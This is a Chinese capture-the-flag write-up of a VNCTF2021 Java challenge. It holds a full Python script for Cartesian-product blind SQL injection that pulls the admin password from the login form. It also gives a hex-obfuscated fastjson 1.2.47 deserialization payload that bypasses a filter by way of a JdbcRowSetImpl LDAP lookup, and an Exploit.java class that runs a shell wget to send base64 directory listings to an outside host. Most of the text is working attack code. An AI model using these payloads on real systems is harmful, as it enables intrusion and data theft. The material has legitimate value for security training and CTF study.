文章来源:EDI安全
java题 开局个登陆框 sql注入?
测得在password位置有注入 一个单引号500。
两个单引号正常
fuzz一下 发现过滤的并不多 但是延时函数过滤了 并且貌似不能布尔盲注 搜了下 可以笛卡尔积盲注。
脚本:
import requests
url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=''
for i in range(1,50):
f1=flag
top=127
low=33
while low<=top:
mid=(top+low)//2
# p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
# p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
data1={'username':'admin','password':p1}
data2={'username':'admin','password':p2}
try:
print(i,mid)
r1=requests.post(url,data=data1,timeout=1)
except requests.exceptions.ReadTimeout as e:
flag+=chr(mid)
print(flag)
break
except Exception as e:
pass
else:
try:
r2=requests.post(url,data=data2,timeout=1)
except requests.exceptions.ReadTimeout as e:
low=mid+1
except Exception as e:
pass
else:
top=mid-1
if flag==f1:
break
# user
# id,username,password
# no_0ne_kn0w_th1s
注:超时时间要自己测下 有时候比较大 有时候比较小 可能跑的人太多了吧
登陆之后发现
测了下可以目录穿越 任意文件读取 读pom.xml
刚好是有漏洞的版本 并且创建角色的时候刚好是json字符串
参考:https://github.com/CaijiOrz/fastjson-1.2.47-RCE
打一下payload 发现被拦了
前两天刚好在p神的星球看到
刚好可以绕过 修改后的payload:
roleJson={"name":{"\x40\x74\x79\x70\x65":"java.lang.Class","val":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"},"x":{"\x40\x74\x79\x70\x65":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","dataSourceName":"ldap://1.1.1.1:1389/Exploit","\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74":true}}
貌似没bash 用dnslog带出来的flag 具体流程参见那篇文章就行了 Exploit.java:
public class Exploit{
public Exploit(){
try{
Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","wget http://1.1.1.1:900/?a=$(ls /|base64 -w0"});
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}